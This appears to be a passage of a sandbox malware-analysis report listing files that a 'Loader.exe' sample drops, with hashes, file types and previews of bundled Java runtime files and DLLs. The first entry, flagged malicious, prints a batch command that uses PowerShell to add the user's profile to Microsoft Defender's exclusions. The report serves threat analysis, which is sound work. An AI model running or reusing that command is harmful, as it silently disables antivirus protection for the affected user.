                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\8b774b6fbd21273c42f034e15d863942.bat

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:DOS batch file, ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.893024342771994
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:/qQ1SJJFIMLVQQNb3DM9bWQqA5SOAGQqPJH0cVERAIrFlceGAFddGeWLCXxHNBOn:/W8MLVHMMQ75NAGQO0cbneGgdEYxDOn
                                                                                                                                                                                                                                                                                                              MD5:2658DFC63032F1C8C59C0233C1CC9769
                                                                                                                                                                                                                                                                                                              SHA1:7AAD97674E967259EAD769FE60F8E40B30A9EDD8
                                                                                                                                                                                                                                                                                                              SHA-256:CCFA651CC1C739B06ADCA460DAEA6A1FBF871457E23BD7BCA52B6A7F0EE767C1
                                                                                                                                                                                                                                                                                                              SHA-512:E37E43BB9FCEADD01758D4E6E21AC173F70D3120307A99D9B4A0292ECC0A341322FC77AB9F6765343371A70D1591488D294F9D536D372E372EBA94F02294558A
                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                              Preview:@ECHO OFF.powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\CampaignHardwareLauncher.exe

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):113664
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.1254848254590355
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:P2ddQ131iYPaa6Hh22U1UMkLZGXUySMaj:Ph5kHcTM2kM
                                                                                                                                                                                                                                                                                                              MD5:ABE04EC3EDDF9D00B7E948E5404E172C
                                                                                                                                                                                                                                                                                                              SHA1:B79FD69B7EAAB09DC299B291CFA2570D6B1E7DF1
                                                                                                                                                                                                                                                                                                              SHA-256:073014710DF4373683296AF3863B279D76E6E0958859C7484210D4067F7F2A32
                                                                                                                                                                                                                                                                                                              SHA-512:3E564765D3A0A1FAF34D5D85A4F66D3BE0ED442EA579881116F5B2A09573C3FFE019C34B7C3543FB69EE2B8CBECEBE1078336963E4CBBB098CCB90ACC4B89577
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^g.................b...V....................@.................................tZ....@... ..............................0.......@...@...........................................................................2...............................text....`.......b.................. .0`.data...@............f..............@.0..rdata...............h..............@.0@.bss....0.............................0..idata.......0.......n..............@.0..rsrc....@...@...B...z..............@.0.................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\COPYRIGHT

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3313
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.557128068430301
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:a58tiSm9iicC7CRRS9i7cq11iUDcsMLks0h9n:WOi59rcF/Cigq11iUD5MLks0z
                                                                                                                                                                                                                                                                                                              MD5:FC605D978E7825595D752DF2EF03F8AF
                                                                                                                                                                                                                                                                                                              SHA1:C493C9541CAAEE4BFE3B3E48913FD9DF7809299F
                                                                                                                                                                                                                                                                                                              SHA-256:7D697EAA9ACF50FE0B57639B3C62FF02916DA184F191944F49ECA93D0BB3374F
                                                                                                                                                                                                                                                                                                              SHA-512:FB811DE6A2B36B28CA904224EA3525124BD4628CA9618C70EB9234AB231A09C1B1F28D9B6301581A4FA2E20F1036D5E1C3D6F1BF316C7FE78EF6EDEAE50EA40E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Copyright . 1993, 2016, Oracle and/or its affiliates...All rights reserved.....This software and related documentation are provided under a..license agreement containing restrictions on use and..disclosure and are protected by intellectual property laws...Except as expressly permitted in your license agreement or..allowed by law, you may not use, copy, reproduce, translate,..broadcast, modify, license, transmit, distribute, exhibit,..perform, publish, or display any part, in any form, or by..any means. Reverse engineering, disassembly, or..decompilation of this software, unless required by law for..interoperability, is prohibited.....The information contained herein is subject to change..without notice and is not warranted to be error-free. If you..find any errors, please report them to us in writing.....If this is software or related documentation that is..delivered to the U.S. Government or anyone licensing it on..behalf of the U.S. Government, the following notice is..applicable:...

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\LICENSE

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.271470906740504
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:c3AXFshzhRSkv:c9hzhgkv
                                                                                                                                                                                                                                                                                                              MD5:67CB88F6234B6A1F2320A23B197FA3F6
                                                                                                                                                                                                                                                                                                              SHA1:877ACEBA17B28CFFF3F5DF664E03B319F23767A1
                                                                                                                                                                                                                                                                                                              SHA-256:263E21F4B43C118A8B4C07F1A8ACB11CAFC232886834433E34187F5663242360
                                                                                                                                                                                                                                                                                                              SHA-512:4D43E5EDECAB92CEBD853204C941327DCCBFD071A71F066C12F7FB2F1B2DEF59C37A15CE05C4FE06EC2EA296B8630C4E938254A8A92E149E4A0A82C4307D648F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Please refer to http://java.com/license..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\README.txt

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.2563005536211715
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:c3AXFshzhRSkjn:c9hzhgkjn
                                                                                                                                                                                                                                                                                                              MD5:4BDA1F1B04053DCFE66E87A77B307BB1
                                                                                                                                                                                                                                                                                                              SHA1:B8B35584BE24BE3A8E1160F97B97B2226B38FA7D
                                                                                                                                                                                                                                                                                                              SHA-256:FD475B1619675B9FB3F5CD11D448B97EDDEE8D1F6DDCCA13DED8BC6E0CAA9CF3
                                                                                                                                                                                                                                                                                                              SHA-512:997CEE676018076E9E4E94D61EC94D5B69B148B3152A0148E70D0BE959533A13AD0BC1E8B43268F91DB08B881BF5050A6D5C157D456597260A2B332A48068980
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Please refer to http://java.com/licensereadme..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME-JAVAFX.txt

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):111645
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.8590909329531025
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:iiVRF8bLuepEvc5O5YwT3JJ4WOHHA/AFjrlHyEepdfZ9JIH4gDq:dRMiCOjJJ4pg/0Hx9MlZ9KH47
                                                                                                                                                                                                                                                                                                              MD5:0E05BD8B9BFCF17F142445D1F8C6561C
                                                                                                                                                                                                                                                                                                              SHA1:CF0A9F4040603008891AA0731ABF89CE2403F2FB
                                                                                                                                                                                                                                                                                                              SHA-256:C3EA3996241B8E9AE7DB3780E470174076FD2003D8AEFAA77BF0BAB5E04DE050
                                                                                                                                                                                                                                                                                                              SHA-512:07C7865D31D22BA0C68E384AFEDC22261F7B3A82BEBC9324145FF7F631623ECA2DC31C71CDBBFC9FEBC1733451A095302DE2A0877821A5B68038E350969BF460
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.DO NOT TRANSLATE OR LOCALIZE....***************************************************************************....%%The following software may be included in this product:..Microsoft DirectShow - Base Classes....Use of any of this software is governed by the terms of the license below:....MSDN - Information on Terms of Use....Updated: February 13, 2008....ON THIS PAGE.... * ACCEPTANCE OF TERMS.. * PRIVACY AND PROTECTION OF PERSONAL INFORMATION.. * NOTICE SPECIFIC TO APIs AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO SOFTWARE AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO DOCUMENTATION AVAILABLE ON THIS WEB SITE.. * NOTICES REGARDING SOFTWARE, DOCUMENTATION, APIS AND SERVICES AVAILABLE ON..THIS WEB SITE.. * RESERVATION OF RIGHTS.. * MEMBER ACCOUNT, PASSWORD, AND SECURITY.. * NO UNLAWFUL OR PROHIBITED USE.. * USE OF SERVICES.. * MATERIALS PROVIDED TO MICROSOFT OR POSTED AT ANY MICROSOFT WEB SITE.. * NOTICES AND PROCEDURE FOR MAKING CLAIMS OF COP

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\THIRDPARTYLICENSEREADME.txt

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):180668
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.064180003233063
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:54ct+BcF1N7m8arf1kHRSusX2NyJ9KH4PF4j52eTjLAzE7GzmCK+XNhalQxkM8QB:N7mtrf1GhMF4j5RMGQoyzaXmR
                                                                                                                                                                                                                                                                                                              MD5:0E87879F452892B85C81071A1DDD5A2A
                                                                                                                                                                                                                                                                                                              SHA1:2CF97C1A84374A6FBBD5D97FE1B432FA799C3B19
                                                                                                                                                                                                                                                                                                              SHA-256:9C18836FD0B5E4B0C57CFFDB74574FA5549085C3B327703DC8EFE4208F4E3321
                                                                                                                                                                                                                                                                                                              SHA-512:10BA68FFD9DEAB10A0B200707C3AF9E95E27AED004F66F049D41310CB041B7618EE017219C848912D5951599208D385BCB928DD33175652101C7E5BC2E3EBA5B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:DO NOT TRANSLATE OR LOCALIZE...-----------------------------....%% This notice is provided with respect to ASM Bytecode Manipulation ..Framework v5.0.3, which may be included with JRE 8, and JDK 8, and ..OpenJDK 8.....--- begin of LICENSE ---....Copyright (c) 2000-2011 France T.l.com..All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:....1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution.....3. Neither the name of the copyright holders nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without specific prior written

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\Welcome.html

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):983
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.135635144562017
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:+STATDcxWpAVjXQ5cjaJ2gjQo4OSED6R8R/TtDpM:+STATD7pqjXBeJdso4OnxRc
                                                                                                                                                                                                                                                                                                              MD5:3CB773CB396842A7A43AD4868A23ABE5
                                                                                                                                                                                                                                                                                                              SHA1:ACE737F039535C817D867281190CA12F8B4D4B75
                                                                                                                                                                                                                                                                                                              SHA-256:F450AEE7E8FE14512D5A4B445AA5973E202F9ED1E122A8843E4DC2D4421015F0
                                                                                                                                                                                                                                                                                                              SHA-512:6058103B7446B61613071C639581F51718C12A9E7B6ABD3CF3047A3093C2E54B2D9674FAF9443570A3BB141F839E03067301FF35422EB9097BD08020E0DD08A4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:<html>..<head>..<title>..Welcome to the Java(TM) Platform..</title>..</head>..<body>....<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>..<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime .. Environment. This provides complete runtime support for Java applications. ..<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> .. Plug-in product which supports the Java environment inside web browsers. ..<h3>References</h3>..<p>..See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product..documentation for more information on using the Java Plug-in product...<p> See the <a href=.."http://www.oracle.com/technetwork/java/javase/overview/"..>Java Platform</a> web site for .. more information on the Java Platform. ..<hr>..<font size="-2">..Copyright (c) 2006, 2016, Oracle and/or its affiliates. All rights reserved...</font>..<p>..</body>..</html>..

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge-32.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14912
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.141852308272967
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:7pQMhM63XLPVT6MsMPapRuBUEp7nYe+PjPriT0fwtK:7muL7PV4aapRuBTp7nYPLr7J
                                                                                                                                                                                                                                                                                                              MD5:D63933F4E279A140CC2A941CCFF38348
                                                                                                                                                                                                                                                                                                              SHA1:75169BE2E9BCFE20674D72D43CA6E2BC4A5A9382
                                                                                                                                                                                                                                                                                                              SHA-256:532D049E0D7A265754902C23B0F150D665A78A3D6FE09AD51C9BE8C29D574A3D
                                                                                                                                                                                                                                                                                                              SHA-512:D7A5023A5EB9B0C3B2AD6F55696A166F07FA60F9D1A12D186B23AAAACC92EF948CB5DFFA013AFC90C4BBE3DE077D591185902384F677D0BAE2FF7CFD5DB5E06C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                                                                              • Filename: DHzscd9uqT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              • Filename: AYoF5MX6wK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              • Filename: Confirm Me.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              • Filename: PInstaller.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              • Filename: 123.sfx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              • Filename: EYOFFTITMDLXZJFFCCGFDTBIY.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              • Filename: SSCBOLGZFXVJMEICRNQMJOCDIF.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              • Filename: BOCTGZXINFFCD20242108.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              • Filename: PGCTGZXFCD20242008.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              • Filename: CloudInstaller.zip, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.Z.[.Z.[.Z.[.A<..[.[.A<..Q.[.A<.._.[.S...X.[.Z.Z.D.[.A<..Y.[.A<..[.[.A<..[.[.A<..[.[.RichZ.[.................PE..L...yPjW...........!......................... .....m.........................`......em....@.........................`%......,"..P....@..x............"..@....P.. .... ............................... ..@............ ...............................text............................... ..`.rdata..d.... ......................@..@.data...`....0......................@....rsrc...x....@......................@..@.reloc..^....P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JAWTAccessBridge.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14912
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1347115439165085
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:0Usw4DPU3XLPVT6GsKOhWIutUinYe+PjPriT0fwyI8:ew7PVIKyWIutDnYPLr728
                                                                                                                                                                                                                                                                                                              MD5:B4EB9B43C293074406ADCA93681BF663
                                                                                                                                                                                                                                                                                                              SHA1:16580FB7139D06A740F30D34770598391B70AC96
                                                                                                                                                                                                                                                                                                              SHA-256:8CD69AF7171F24D57CF1E6D0D7ACD2B35B4EA5FDF55105771141876A67917C52
                                                                                                                                                                                                                                                                                                              SHA-512:A4E999E162B5083B6C6C3EAFEE4D84D1EC1C61DCA6425F849F352FFDCCC2E44DFEE0625C210A8026F9FF141409EEBF9EF15A779B26F59B88E74B6A2CE2E82EF9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.Z.[.Z.[.Z.[.A<..[.[.A<..Q.[.A<.._.[.S...X.[.Z.Z.D.[.A<..Y.[.A<..[.[.A<..[.[.A<..[.[.RichZ.[.................PE..L...zPjW...........!......................... .....m.........................`.......2....@.........................`%......,"..P....@..p............"..@....P.. .... ............................... ..@............ ...............................text............................... ..`.rdata..a.... ......................@..@.data...`....0......................@....rsrc...p....@......................@..@.reloc..^....P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge-32.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):128064
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.428684952829155
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:uN77TJSG78+5Orcj5K/e2Hrgc6kZAn1yEkBKMKy1Zf22QYHJiuzTl8ShzzM+64mn:uNXd178+5fJZnQLo
                                                                                                                                                                                                                                                                                                              MD5:2F808ED0642BD5CF8D4111E0AF098BBB
                                                                                                                                                                                                                                                                                                              SHA1:006163A07052F3D227C2E541691691B4567F5550
                                                                                                                                                                                                                                                                                                              SHA-256:61DFB6126EBA8D5429F156EAAB24FF30312580B0ABE4009670F1DD0BC64F87BB
                                                                                                                                                                                                                                                                                                              SHA-512:27DBDA3A922747A031FF7434DE5A596725FF5AE2BC6DD83D6D5565EB2BA180B0516896323294459997B545C60C9E06DA6C2D8DD462A348A6759A404DB0F023A7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[d.@:.N@:.N@:.N[..NB:.N[..NB:.N[..NK:.NIB.NE:.N@:.N{:.N[..NG:.N[..NA:.N[..NA:.N[..NA:.NRich@:.N........PE..L...rPjW...........!................#..............m................................p.....@.........................p...........P.......x...............@...........................................p...@............................................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...x...........................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\JavaAccessBridge.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):127552
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.413283221897154
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:SdQ4jWJt4XChlFavveKSQ4gHK/e2Hrgc6kZAn1y1koKMKy1Zf22QYHJiuzTl8ShM:Sy4SJ1TFavvehc7ZnwEr
                                                                                                                                                                                                                                                                                                              MD5:C3DED5F41E28FAF89338FB46382E4C3E
                                                                                                                                                                                                                                                                                                              SHA1:6F77920776D39550355B146D672C199A3941F908
                                                                                                                                                                                                                                                                                                              SHA-256:4691603DFABE6D7B7BEAC887DADC0E96243C2FF4F9A88CE3793E93356C53AA08
                                                                                                                                                                                                                                                                                                              SHA-512:23621F2856899F40CFA9858DC277372BFE39F0205377543EB23E94422D479A53FDF664F4A9A4515C2285811F01D91AB64A834A03A4D3AB0CB7D78F8AF11135FF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[d.@:.N@:.N@:.N[..NB:.N[..NB:.N[..NK:.NIB.NE:.N@:.N{:.N[..NG:.N[..NA:.N[..NA:.N[..NA:.NRich@:.N........PE..L...sPjW...........!...............................m......................................@.........................@...........P.......p...............@...........................................H...@............................................text...n........................... ..`.rdata..............................@..@.data...............................@....rsrc...p...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge-32.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):97856
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.467907542894502
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:/fHGbDtpt+WfGegcX30EJ4YHiYmRkgAPe+GP8uWg1kQOPt:/w2WfGe/30EWbY4Z+GpWuHOPt
                                                                                                                                                                                                                                                                                                              MD5:F78D2BF2C551BE9DF6A2F3210A2964C1
                                                                                                                                                                                                                                                                                                              SHA1:B6A4160ECA4C0D0552234FF69BCFDF45F0A2A352
                                                                                                                                                                                                                                                                                                              SHA-256:9D18E5421A8606985FA54D7CEA921D1B8930358A2E4CDF5FDF2A8B3E4D857288
                                                                                                                                                                                                                                                                                                              SHA-512:AAC8622683BE57518F8B03198A03BF1F760E082692C1FB6252E96CDBA19D3CEB0A6786CCBD7B98830E865297308FA99DBBEA464E41041ABDDA18AEB862BA993F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./zR/k.<|k.<|k.<|p..|{.<|p..|2.<|bc.|n.<|k.=|7.<|p..|O.<|p..|j.<|p..|j.<|p..|j.<|Richk.<|........................PE..L...pPjW...........!................At.............p................................7P....@..........................9..A....1..<....................f..@............................................,..@...............@............................text...\........................... ..`.rdata..Qg.......h..................@..@.data...`,...P.......8..............@....rsrc................F..............@..@.reloc..J............N..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\WindowsAccessBridge.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):95808
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.48897048228647
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:EHSB4i2hJwZaDEoDVzkhbyJCAqn9nV+1vkJnHBoY8BK5Hj:EJJwZWEoDVYby81yiBovkHj
                                                                                                                                                                                                                                                                                                              MD5:E5A6231FE1E6FEC5F547DFD845D209BC
                                                                                                                                                                                                                                                                                                              SHA1:3F21F90ECC377B6099637D5B59593D2415450D45
                                                                                                                                                                                                                                                                                                              SHA-256:51355EA8A7DC238483C8069361776103779CE9FE3CD0267770E321E6E4368366
                                                                                                                                                                                                                                                                                                              SHA-512:D5D20DF0089F3217B627D39ABD57C61E026D0DC537022FB698F85FA6893C7FA348C40295DEEC78506F0EF608827D39E2F6F3538818BA25E2A0EE1145FCC95940
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./zR/k.<|k.<|k.<|p..|{.<|p..|2.<|bc.|n.<|k.=|7.<|p..|O.<|p..|j.<|p..|j.<|p..|j.<|Richk.<|........................PE..L...qPjW...........!................!o.............p......................................@.........................p7..>...<0..<.......x............^..@...........................................(+..@...............@............................text...<........................... ..`.rdata...e.......f..................@..@.data...`,...P.......0..............@....rsrc...x............>..............@..@.reloc..J............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\awt.dll

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1182272
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.63089480914076
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24576:68M4H6ioDs5FELnSbY6Ck2IlAnVCXQlFg3:9eaGnkXQlFQ
                                                                                                                                                                                                                                                                                                              MD5:159CCF1200C422CED5407FED35F7E37D
